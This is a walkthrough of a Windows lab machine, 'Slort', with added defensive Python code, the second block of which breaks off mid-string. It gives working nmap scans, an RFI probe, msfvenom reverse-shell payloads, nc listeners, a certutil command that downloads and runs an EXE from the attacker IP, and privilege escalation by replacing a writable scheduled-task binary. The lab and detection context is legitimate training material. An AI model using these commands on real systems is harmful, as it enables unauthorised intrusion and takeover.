Slort

Summary

General information

Level

Intermediate

System

Windows

Spoiler! - Roadmap

  1. Among the services there is a web application with a /site route that redirects to /site/index.php?page=main.php.

  2. The page parameter turns out to be vulnerable to RFI, and through it we include a URL pointing to our PHP reverse shell.

  3. While enumerating the server we find, in the C:\Backup folder, information about a task that runs a binary called TFTP.exe every 5 minutes, and we see that our user has permission to modify it.

  4. We create an EXE with the same name as the file run by the task and swap it in on the system.

  5. We wait for the task to run and PWNED! }:)

Enumeration

Scanning with nmap

Basic enumeration of all services over TCP, UDP and SCTP:

IP=192.168.198.53
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP

Port and service scan with scripts for the top 1000 ports over TCP and UDP, plus all ports over TCP:

nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP

nmap results

The second scan (nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP) gives us the following information:

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Scan analysis

HTTP - 4443

Among the detected services, the most common ones, such as web services, among others (ftp, smb, etc.), are usually the most interesting, and it is recommended to analyse them first.

http://192.168.198.53:4443/

Directory enumeration

We enumerate directories and possible files with the html, php and txt extensions using the directory-list-2.3-medium.txt wordlist:

IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http://$IP:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k

Accessing the /site path redirects to http://192.168.205.53:4443/site/index.php?page=main.php.

The page parameter refers to a document stored on the web server, and it is possible that this input is not sanitised, which would make it vulnerable to LFI (Local File Inclusion) or RFI (Remote File Inclusion).

Since an RFI would be far more useful to us, as it would let us run a webshell and/or a reverse shell, we first test whether it is vulnerable to RFI.

First, we try a single quote to see how it behaves with that input:

http://192.168.205.53:4443/site/index.php?page=%27
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Indeed, the parameter is not properly sanitised, and we can see that the PHP include function is used, so we will try to include a file hosted on our own machine (RFI). Specifically, we will create a reverse shell and start a listener on a port.
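To make the weakness concrete from the defender's side, here is an added Python example (not code from the original writeup) that models the two ways the page parameter can be handled: the unsafe pattern, where whatever the client sends is passed straight to include, and a hardened resolver that only accepts names from an allowlist and builds the path inside a fixed templates directory. It also runs a small detector over constructed Apache access-log lines (two of them mirror the requests shown in this writeup) to flag inclusion attempts. The allowlisted page names, the templates directory and the log lines are assumptions.

```python
"""Added example (not from the original writeup): how an include() fed by a request
parameter goes wrong, a hardened allowlist resolver, and a detector that flags
inclusion attempts in Apache access logs. Directory, page names and log lines are constructed."""
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# Assumption: only these template names may ever be included.
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}
# Assumption: where the templates live on the server.
TEMPLATE_DIR = PurePosixPath("/var/www/site/pages")

URL_SCHEME = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)
STREAM_WRAPPER = re.compile(r"^(php|data|expect|phar|file|zip|glob)://", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
LOG_PREFIX = re.compile(r"^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\]")


def unsafe_include_target(page: str) -> str:
    """Models include($_GET['page']) with no validation: the client decides the whole
    path, so a URL is fetched and executed when allow_url_include is enabled."""
    return page


def safe_include_target(page: str):
    """Hardened form: the value must be exactly one allowlisted file name, and the
    returned path is built inside TEMPLATE_DIR. Anything else is rejected (None)."""
    if page not in ALLOWED_PAGES:
        return None
    return str(TEMPLATE_DIR / page)


def classify_page_value(page: str) -> str:
    """Label an already URL-decoded page value the way a detection rule would."""
    if page in ALLOWED_PAGES:
        return "ok"
    if URL_SCHEME.match(page) or page.startswith("//"):
        return "rfi"          # remote resource pulled in over the network
    if STREAM_WRAPPER.match(page):
        return "wrapper"      # PHP stream wrapper instead of a plain file
    if ("../" in page or "..\\" in page or "\x00" in page
            or page.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", page)):
        return "lfi"          # path that escapes the template directory
    return "unexpected"       # e.g. the single-quote probe from this writeup


def flag_inclusion_attempts(log_lines, param="page"):
    """Return (client_ip, timestamp, page_value, verdict) for every request whose
    include parameter is not an allowlisted name."""
    findings = []
    for line in log_lines:
        head = LOG_PREFIX.match(line)
        req = REQUEST_LINE.search(line)
        if not head or not req:
            continue
        query = urlsplit(req.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            verdict = classify_page_value(value)
            if verdict != "ok":
                findings.append((head.group("ip"), head.group("ts"), value, verdict))
    return findings


# Constructed Apache access-log lines; the %27 and http:// requests mirror this writeup.
SAMPLE_LOG = [
    '192.168.45.5 - - [04/Mar/2023:17:40:01 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 1532',
    '192.168.45.5 - - [04/Mar/2023:17:41:10 +0000] "GET /site/index.php?page=%27 HTTP/1.1" 200 244',
    '192.168.45.5 - - [04/Mar/2023:17:42:33 +0000] "GET /site/index.php?page=http://192.168.45.5/test.php HTTP/1.1" 200 0',
    '192.168.45.5 - - [04/Mar/2023:17:43:05 +0000] "GET /site/index.php?page=../../../../Windows/win.ini HTTP/1.1" 200 310',
    '10.0.0.7 - - [04/Mar/2023:17:44:00 +0000] "GET /dashboard/ HTTP/1.1" 200 7112',
]

if __name__ == "__main__":
    for finding in flag_inclusion_attempts(SAMPLE_LOG):
        print(finding)
```

The allowlist is the fix that matters: no amount of stripping "../" or "http://" from the value is as robust as refusing everything that is not one of a handful of known template names, and the detector exists only so that probes like the single quote or the remote URL show up in the log review even when the application itself was never patched.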

Exploitation

RFI - Remote File Inclusion

Now that we have found a possible entry point, we create our reverse shell.

Friendly reminder: whenever possible, use ports 53, 80 or 443. On these ports it is less likely that the firewall will block the connection, so the reverse shell is more likely to succeed.

msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
python3 -m http.server 80
sudo rlwrap nc -lnvp 443
http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php

And... PWNED! 8)

Now, to get a better cmd, we are going to upload an EXE. To do so, we use msfvenom again:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80

We start a listener on port 53:

sudo rlwrap nc -lnvp 53

On the victim machine we run the following to download the EXE and then execute it:

certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe

When we run it, we get a better cmd.

Privilege escalation

Before turning to automated enumeration, we take a quick look around the system and enumerate manually.

Scheduled task every 5 minutes

In C:\ we find a Backup folder. Reading the information in the files inside it, we see that an EXE is run every 5 minutes.

cd C:\ && dir
cd Backup && dir

Binary with write permissions

type backup.txt
type info.txt

Let's check the permissions on that executable in case we have write access and can replace it with an executable of our own.

powershell -c "Get-Acl TFTP.exe | fl"
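The check a defender would run for this class of misconfiguration, as an added Python example that is not part of the original writeup: it reads the text printed by schtasks /query /fo CSV /v and by icacls for each task's executable (both collected on the host beforehand) and reports every task whose binary can be modified by a principal that is not SYSTEM, Administrators or TrustedInstaller. The sample task list (trimmed to the columns the audit reads), the sample ACL text, the privileged-principal set and the list of icacls right codes treated as "can change the file" are all assumptions.

```python
"""Added example (not from the original writeup): correlate scheduled-task actions with
the ACL of the binary they run, to spot a task run by a privileged account whose
executable ordinary users may modify. Inputs are the text that `schtasks /query /fo CSV /v`
and `icacls <file>` print on the host; the samples at the bottom are constructed."""
import csv
import io
import re

# Assumption: principals that are expected to hold write access on a task's binary.
PRIVILEGED_PRINCIPALS = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "NT SERVICE\\TrustedInstaller"}
PRIVILEGED_UPPER = {p.upper() for p in PRIVILEGED_PRINCIPALS}
# Assumption: icacls right codes that allow changing or replacing the file contents.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}


def parse_icacls(path: str, output: str):
    """Return [(principal, set_of_right_codes)] from the output of `icacls <path>`.
    The first line begins with the path itself; later lines are indented ACEs for the same file."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        principal, sep, rights_str = line.partition(":(")
        if not sep:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", "(" + rights_str):
            rights.update(r.strip() for r in group.split(","))
        entries.append((principal, rights))
    return entries


def writable_by_unprivileged(acl_entries):
    """Principals outside PRIVILEGED_PRINCIPALS holding a right that lets them modify the file."""
    return sorted(p for p, rights in acl_entries
                  if p.upper() not in PRIVILEGED_UPPER and rights & WRITE_RIGHTS)


def executable_of(task_to_run: str):
    """Executable path from a 'Task To Run' cell: a quoted path, else the first token."""
    cmd = task_to_run.strip()
    if not cmd or cmd.upper() in {"N/A", "COM HANDLER"}:
        return None
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else None
    return cmd.split()[0]


def audit_tasks(schtasks_csv: str, icacls_outputs: dict):
    """One finding per task whose executable an unprivileged principal can modify.
    icacls_outputs maps executable path -> text printed by `icacls <path>`."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        if row.get("TaskName") == "TaskName":   # schtasks repeats its header per task folder
            continue
        exe = executable_of(row.get("Task To Run", ""))
        if not exe:
            continue
        acl_text = next((t for p, t in icacls_outputs.items() if p.lower() == exe.lower()), None)
        if acl_text is None:
            continue
        writers = writable_by_unprivileged(parse_icacls(exe, acl_text))
        if writers:
            findings.append({"task": row["TaskName"], "runs_as": row.get("Run As User", ""),
                             "executable": exe, "writable_by": writers,
                             "every": row.get("Repeat: Every", "")})
    return findings


# Constructed sample: schtasks CSV trimmed to the columns the audit reads.
SAMPLE_SCHTASKS = (
    '"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"\n'
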